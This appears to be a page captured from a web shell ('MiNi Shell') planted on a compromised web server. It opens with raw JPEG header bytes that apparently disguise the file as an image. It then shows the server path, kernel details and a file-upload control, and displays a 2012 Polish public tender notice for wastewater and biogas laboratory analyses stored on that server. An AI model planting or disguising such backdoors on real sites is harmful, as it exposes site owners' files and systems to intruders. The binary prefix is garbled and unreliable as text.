JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/251462-N-2012.html

<p class="kh_header"><b>Tychy: Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice</b><br>
<b>Numer ogłoszenia: 251462 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: osoba prawna utworzona w celu zaspokajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie analiz laboratoryjnych dla Oczyszczalni Ścieków Tychy-Urbanowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie analiz mikrobiologicznych próbek ścieków, analiz mikrobiologicznych nawozu mineralnego (struwitu), analiz laboratoryjnych zawartości metali oraz badania biogazu dla oczyszczalni ścieków Tychy- Urbanowice. Wykonawca może złożyć ofertę częściową na jedną lub dwie części zamówienia. Oferta składana na część 1 lub 2 zamówienia musi zawierać pełen zakres danej części. Oferty nie zawierające wszystkich pozycji z danej części zostaną odrzucone jako niezgodne z treścią siwz.  
CZĘŚĆ 1 - Wykonywanie analiz mikrobiologicznych ścieków oczyszczonych, nawozu mineralnego (struwitu) oraz analiz laboratoryjnych próbek ścieków oczyszczonych, odcieku z wirówki i nawozu mineralnego (struwitu) na zawartość metali. 
1A) Analiza mikrobiologiczna ścieków oczyszczonych:
a. Bakterie ogólne w 22°C- 72 oznaczenia
b. Bakterie ogólne w 37°C - 72 oznaczenia
c. Bakterie grupy Coli i Coli typu kałowego- 72 oznaczenia
d. Enterokoki- 72 oznaczenia
e. Salmonella- 72 oznaczenia
2A) Analiza mikrobiologiczna nawozu mineralnego: 
a. Żywe jaja pasożytów jelitowych Ascaris sp. Trichuris sp. Toxocara sp-5 oznaczeń;
b. Salmonella-5 oznaczeń;
3A) Analiza ścieków oczyszczonych, odcieku z wirówki i nawozu mineralnego:
a. oznaczanie cynku, niklu, arsenu, miedzi, chromu w ściekach oczyszczonych- 15 oznaczeń każdego parametru,
b. oznaczanie żelaza, manganu, miedzi, cynku, glinu w odcieku z wirówki- 5 oznaczeń każdego parametru,
c. oznaczania chromu, kadmu, niklu, ołowiu, rtęci, arsenu, potasu w nawozie mineralnym-5 oznaczeń każdego parametru.
CZĘŚĆ 2 - Wykonywanie analizy wilgotności, wartości opałowej i składu biogazu wraz ze związkami krzemu.
1B).skład gazu  O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3], wilgotność, wartość opałowa [mg/Nm3]  - 10 oznaczeń każdego parametru;
2B).badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan-5 oznaczeń każdego parametru.
Informacje szczegółowe dotyczące zamówienia:
Część 1 zamówienia: 
1) Zamawiający dopuszcza wykonanie analiz według własnych procedur badawczych Wykonawcy.
2) Wykonawca dostarczy pojemniki do poboru próbek. 
3) Wykonawca ponosi koszty dojazdu do Oczyszczalni Ścieków Tychy-Urbanowice  
i transportu próbek do laboratorium
4) Próbki  do badań pobierane będą przez przedstawiciela Zamawiającego.
5) Wykonawca odbierze próbki  do badań z Oczyszczalni Ścieków Tychy-Urbanowice oraz przekaże je do laboratorium.
6) Wykonawca przeprowadzi badania zawartości metali po uprzednim, pisemnym zleceniu Zamawiającego, w którym zostanie określony termin odbioru próbek, wykonywania analiz laboratoryjnych i przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 7 dni roboczych od przesłania pisemnego zlecenia).
7) Wykonawca przeprowadzi badanie mikrobiologiczne w dniu poboru próbek po uprzednim, pisemnym zleceniu Zamawiającego,  w którym  zostanie określony termin odbioru próbek, wykonywania analiz laboratoryjnych i przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 7 dni roboczych od przesłania pisemnego zlecenia).
8) Zmniejszenie przez Zamawiającego ilości zamawianych analiz nie stanowi podstawy 
do dochodzenia roszczeń z tego tytułu przez Wykonawcę w stosunku  do Zamawiającego.
Część 2 zamówienia: 
1) Zamawiający dopuszcza wykonanie analiz według własnych procedur badawczych Wykonawcy.
2) Wykonawca przeprowadzi badanie biogazu w dniu wykonania pomiarów i poboru próbek, po uprzednim, pisemnym zleceniu Zamawiającego, w którym  zostanie określony termin wykonania pomiarów i poboru próbek, wykonania analiz laboratoryjnych i termin przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 5 dni roboczych od przesłania pisemnego zlecenia).
3) Pobór próbek biogazu oraz ich transport z oczyszczalni odbywać się będzie w naczyniach laboratoryjnych należących do Wykonawcy. Wykonawca ponosi koszty transportu próbek 
z oczyszczalni do miejsca wykonania analiz laboratoryjnych. Próbki  do badań pobierane będą przez przedstawiciela Wykonawcy, który przekaże je do laboratorium.
4) Zmniejszenie przez Zamawiającego ilości zamawianych analiz nie stanowi podstawy 
do dochodzenia roszczeń z tego tytułu przez Wykonawcę w stosunku  do Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykoskość wadium dla poszczególnych części zamówienia wynowi:
Część 1 - 500,00 PLN (słownie: pięćset złotych), 
Część 2 - 400,00 PLN (słownie: czterysta złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek, jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek, jeżeli:
a) złoży podpisane oświadczenie, iż posiada w zakresie niniejszego zamówienia niezbędną wiedzę i doświadczenie - załącznik nr 2 siwz oraz,
b) dla Część 1 zamówienia:
1. w zakresie określonym w pkt. III ppkt.1A siwz - potwierdzi należyte wykonanie analiz mikrobiologicznych ścieków w ilości co najmniej 30 analiz mikrobiologicznych ścieków oczyszczonych/rok osobno dla każdego parametru, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
2. w zakresie określonym w pkt. III ppkt.2A siwz - potwierdzi należyte wykonanie analiz mikrobiologicznych nawozu lub matrycy równoważnej w ilości 
co najmniej 3 analiz mikrobiologicznych nawozu mineralnego lub matrycy równoważnej/rok osobno dla każdego parametru, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.
3. w zakresie określonym w pkt. III ppkt.3A siwz - potwierdzi należyte wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, analiz laboratoryjnych zawartości metali: 
a) w ściekach oczyszczonych w ilości co najmniej 5 analiz/rok  dla każdego   
parametru określonego w pkt.III ppkt.3Aa) SIWZ, 
b) w odcieku z wirówki lub ścieku w ilości co najmniej 3 analiz/rok  
dla każdego parametru  określonego w pkt.III ppkt.3Ab) SIWZ 
c) nawozu mineralnego lub matrycy równoważnej w ilości co najmniej 
3  analiz/rok  dla każdego parametru określonego w pkt.III ppkt.3Ac) SIWZ 
W celu wykazania wymaganej przez Zamawiającego ilości analiz Zamawiający dopuszcza łączenie umów / zleceń wykonywanych na rzecz różnych podmiotów,  pod warunkiem, że analizy zostały zakończone.    
W treści załącznika nr 5 do siwz tj. wykaz wykonanych usług, do każdej wykonanej usługi należy dopisać jej przedmiot, datę wykonania i odbiorcę 
oraz załączyć dokument, potwierdzający, że usługa ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek, jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek, jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnił w/w warunek, jeżeli złoży podpisane oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - załącznik nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz Oferty - załącznik nr 1 do siwz 
2) Kosztorys ofertowy - załącznik nr 1A - dla części 1; załącznik nr 1B - dla części 2 zamówienia.  
3) Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów-załącznik nr 4.
4) W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 u.p.z.p.
5) Kserokopia dowodu wniesienia wadium, zgodnie z pkt.VIII.ppkt.2. Siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w następujących przypadkach:
a) konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody np. ulewne opady deszczu, nadzwyczajne, ponadnormatywne opady śniegu, niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny,
b) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,      
c) jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), dla faktur wystawionych po zmianie stawki podatku, podatek VAT będzie obliczony w obowiązującej stawce, bez konieczności zmiany umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 10:00, miejsce: Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów oraz zawarcia umowy ramowej. Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych: 13.07.2012r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie analiz mikrobiologicznych ścieków oczyszczonych, nawozu mineralnego (struwitu) oraz analiz laboratoryjnych próbek ścieków oczyszczonych, odcieku z wirówki i nawozu mineralnego (struwitu) na zawartość metali.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1A) Analiza mikrobiologiczna ścieków oczyszczonych:
a. Bakterie ogólne w 22°C- 72 oznaczenia
b. Bakterie ogólne w 37°C - 72 oznaczenia
c. Bakterie grupy Coli i Coli typu kałowego- 72 oznaczenia
d. Enterokoki- 72 oznaczenia
e. Salmonella- 72 oznaczenia
2A) Analiza mikrobiologiczna nawozu mineralnego: 
a. Żywe jaja pasożytów jelitowych Ascaris sp. Trichuris sp. Toxocara sp-5 oznaczeń;
b. Salmonella-5 oznaczeń;
3A) Analiza ścieków oczyszczonych, odcieku z wirówki i nawozu mineralnego:
a. oznaczanie cynku, niklu, arsenu, miedzi, chromu w ściekach oczyszczonych- 15 oznaczeń każdego parametru,
b. oznaczanie żelaza, manganu, miedzi, cynku, glinu w odcieku z wirówki- 5 oznaczeń każdego parametru,
c. oznaczania chromu, kadmu, niklu, ołowiu, rtęci, arsenu, potasu w nawozie mineralnym-5 oznaczeń każdego parametru.
Informacje szczegółowe dotyczące zamówienia:
1) Zamawiający dopuszcza wykonanie analiz według własnych procedur badawczych Wykonawcy.
2) Wykonawca dostarczy pojemniki do poboru próbek. 
3) Wykonawca ponosi koszty dojazdu do Oczyszczalni Ścieków Tychy-Urbanowice  
i transportu próbek do laboratorium
4) Próbki  do badań pobierane będą przez przedstawiciela Zamawiającego.
5) Wykonawca odbierze próbki  do badań z Oczyszczalni Ścieków Tychy-Urbanowice oraz przekaże je do laboratorium.
6) Wykonawca przeprowadzi badania zawartości metali po uprzednim, pisemnym zleceniu Zamawiającego, w którym zostanie określony termin odbioru próbek, wykonywania analiz laboratoryjnych i przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 7 dni roboczych od przesłania pisemnego zlecenia).
7) Wykonawca przeprowadzi badanie mikrobiologiczne w dniu poboru próbek po uprzednim, pisemnym zleceniu Zamawiającego,  w którym  zostanie określony termin odbioru próbek, wykonywania analiz laboratoryjnych i przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 7 dni roboczych od przesłania pisemnego zlecenia).
8) Zmniejszenie przez Zamawiającego ilości zamawianych analiz nie stanowi podstawy do dochodzenia roszczeń z tego tytułu przez Wykonawcę w stosunku  do Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie analizy wilgotności, wartości opałowej i składu biogazu wraz ze związkami krzemu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1B).skład gazu  O2 [%], CO [%], CO2 [%], CH4 [%], H2S [mg/Nm3], HCl [mg/Nm3], 
HF [mg/Nm3] formaldehyd [mg/Nm3], amoniak [mg/Nm3], wilgotność, wartość opałowa [mg/Nm3]  - 10 oznaczeń każdego parametru;
2B).badanie związków krzemu w zakresie: tetrametylosilan, trimetylosilanol, heksametylodisiloksan, heksametylocyklotrisiloksan, oktametylotrisiloksan, oktametylocyklotetrasiloksan, dekametylotetrasiloksan, dekametylocyklopentasiloksan- 5 oznaczeń każdego parametru.
Informacje szczegółowe dotyczące zamówienia:
1) Zamawiający dopuszcza wykonanie analiz według własnych procedur badawczych Wykonawcy.
2) Wykonawca przeprowadzi badanie biogazu w dniu wykonania pomiarów i poboru próbek, po uprzednim, pisemnym zleceniu Zamawiającego, w którym  zostanie określony termin wykonania pomiarów i poboru próbek, wykonania analiz laboratoryjnych i termin przekazania sprawozdania z badań (całkowity termin realizacji nie dłuższy niż 5 dni roboczych od przesłania pisemnego zlecenia).
3) Pobór próbek biogazu oraz ich transport z oczyszczalni odbywać się będzie w naczyniach laboratoryjnych należących do Wykonawcy. Wykonawca ponosi koszty transportu próbek 
z oczyszczalni do miejsca wykonania analiz laboratoryjnych. Próbki  do badań pobierane będą przez przedstawiciela Wykonawcy, który przekaże je do laboratorium.
4) Zmniejszenie przez Zamawiającego ilości zamawianych analiz nie stanowi podstawy do dochodzenia roszczeń z tego tytułu przez Wykonawcę w stosunku  do Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com